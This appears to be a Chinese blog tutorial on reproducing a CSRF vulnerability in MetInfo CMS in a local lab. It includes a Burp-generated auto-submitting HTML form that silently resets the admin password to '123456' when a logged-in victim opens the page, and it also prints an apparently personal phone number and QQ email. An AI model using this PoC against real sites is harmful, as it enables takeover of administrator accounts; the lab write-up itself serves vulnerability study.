首页 > 其他分享 >metinfo-csrf漏洞复现攻略

metinfo-csrf漏洞复现攻略

时间:2024-12-17 20:02:48浏览次数:9  
标签:CSRF 登录 漏洞 密码 点击 管理员 metinfo csrf 复现

CSRF漏洞概念:由于⽹站对⽤户⽹⻚浏览器的信任导致⽤户在当前已登录的Web站点的状态下,访问攻击者构造的攻击连接从⽽执⾏⾮本意的操作的漏洞

CSRF漏洞利⽤条件:

1.⽤户处于登陆⽬标⽹站的状态(Cookie)

2.⽤户点击攻击者发送的恶意URL连接

下面是详细的流程:

将所需要的 metinfo 文件放在网站的 www 目录下

浏览器访问:http://localhost/metinfo/ ,首先进行初始化

下滑到最下面,点击“我已仔细阅读以上协议并同意安装”

检查全部为通过状态,点击“下一步”

按照上述指引操作,其中数据库密码为你自己的数据库密码,然后点击“保存数据库设置并继续”

此时我们进入管理员设置页面,按照指示设置管理员信息,点击“保存管理设置”

这样我们就安装完毕了,然后点击“管理网站”进入后台登录系统

输入上面设置的账户密码登录即可进入后台,点击“用户-管理员”

点击“编辑”修改管理员登录密码

这个时候我们可以打开bp抓取提交的请求包,先打开拦截再点击“保存”

然后鼠标右键选择“相关工具”-“生成CSRF-PoC”

点击“复制HTML”

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/metinfo/admin/admin/save.php?action=editor&id=1&lang=cn&anyid=47&edtp=" method="POST">
      <input type="hidden" name="useid" value="admin" />
      <input type="hidden" name="nosql" value="1" />
      <input type="hidden" name="pass1" value="123456" />
      <input type="hidden" name="pass2" value="123456" />
      <input type="hidden" name="name" value="" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="tel" value="" />
      <input type="hidden" name="mobile" value="15534315620" />
      <input type="hidden" name="email" value="2987925711&#64;qq&#46;com" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="msn" value="" />
      <input type="hidden" name="taobao" value="" />
      <input type="hidden" name="admin&#95;introduction" value="å&#136;&#155;å&#167;&#139;人" />
      <input type="hidden" name="Submit" value="ä&#191;&#157;å&#173;&#152;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

注:上面圈住的地方是要攻击对象的网址

然后我们打开网站的 www 目录,在此目录下新建一个文本文档,将复制的HTML代码粘贴过来,并将文件后缀名改为‘.html’,这里我将其命名为 3.html

然后我们再打开另一个浏览器,模拟被攻击者,要确保用户保持登录状态,不然不会成功

然后访问:“http://localhost/3.html”

发现出现了以上页面,这里我们试试最开始的登录密码试着登录,显示密码错误

这时我们可以将登陆密码换成后面设置的试试,发现登录成功

这样我们就利用 CSRF 漏洞成功修改了管理员 admin 的密码

标签:CSRF,登录,漏洞,密码,点击,管理员,metinfo,csrf,复现
From: https://blog.csdn.net/2401_88387979/article/details/144488337

相关文章

  • MetInfo中CSRF漏洞复现
    一、访问我们的靶场后台进行登录这里我们同时用Edge和火狐浏览器火狐浏览器用来做攻击方,Edge扮演受害者二、利用火狐浏览器抓包构造html链接攻击1.在火狐浏览器中新建管理员输入数据并抓包2.利用抓包请求制作链接制作du.html三、将攻击链接发给受害者四、当受害......
  • 【全网最详细】CSRF漏洞原理攻击与防御
    CSRF漏洞原理攻击与防御目录CSRF漏洞原理攻击与防御一、什么是CSRF?二、CSRF攻击原理及过程三、CSRF分类1.GET类型的CSRF2.POST类型的CSRF四、CSRF漏洞的挖掘五、CSRF漏洞的防御1、验证码2、在请求地址中添加token并验证3、在HTTP头中自定义属性并验证4、验证H......
  • GAN对抗生成网络模型详解及代码复现
    基本概念生成对抗网络(GenerativeAdversarialNetworks,GAN)是由IanGoodfellow等人于2014年提出的开创性深度学习模型。GAN的独特之处在于其对抗性训练方式,通过两个神经网络的相互竞争来生成高质量的新数据。GAN由两个核心组件构成:生成器(Generator):负责从随机噪声......
  • 注意力机制分类、详解及代码复现
    定义与起源注意力机制源于对人类视觉系统的深入研究,模拟了人类大脑在处理海量信息时的选择性关注能力。这一机制使神经网络能够在处理复杂输入时,自动识别并聚焦于最关键的部分,从而提高模型的性能和泛化能力。通过这种方式,注意力机制有效解决了信息过载的问题,在计算资源受......
  • 【代码复现】Face X-ray for More General Face Forgery Detection
    前言:这篇文章记录了本人复现FaceX-ray代码的过程以及参考的代码。由于这篇文章是笔者在完成复现完编写的,可能会有一些bug或者问题遗漏。在实现过程中,在关键点检测和混合人脸的过程推荐使用3.6版本的python环境。一、关键点检测原文参考的关键点检测模型是Jointcascadefac......
  • 【EI复现】基于深度强化学习的微能源网能量管理与优化策略研究(Python代码实现)
    ......
  • 【完美复现】面向配电网韧性提升的移动储能预布局与动态调度策略【IEEE33节点】(Matlab
     ......
  • 描述CSRF的攻击原理
    CSRF(跨站请求伪造)攻击的原理在于利用用户已经登录的信任状态,诱骗用户在不知情的情况下执行恶意请求。攻击者不会直接获取用户的凭证(如密码),而是利用用户已有的会话令牌(cookie)等来伪造请求。具体来说,攻击流程如下:攻击者构建恶意链接或表单:攻击者创建一个包含恶意请求的链接或......
  • 360加固分析复现(未完)
    360数字加固解析加固特征:application的第一入口是android:name="com.stub.StubApp"Application的onCreate和attachBaseContext是Application的两个回调方法,通常我们会在其中做一些初始化操作,attachBaseContext在onCreate之前执行![image-20241209171203322]a.b(......
  • MetInfo后台账号密码忘记了怎么办
    如果忘记了MetInfo后台的账号密码,可以尝试以下几种方法来找回:一、通过找回密码功能如果网站后台登录界面提供了找回密码的功能,可以利用该功能来修改登录密码。通常,这需要提供与账号关联的邮箱或手机号码,以接收重置密码的链接或验证码。二、直接修改数据库中的账号密码连接数......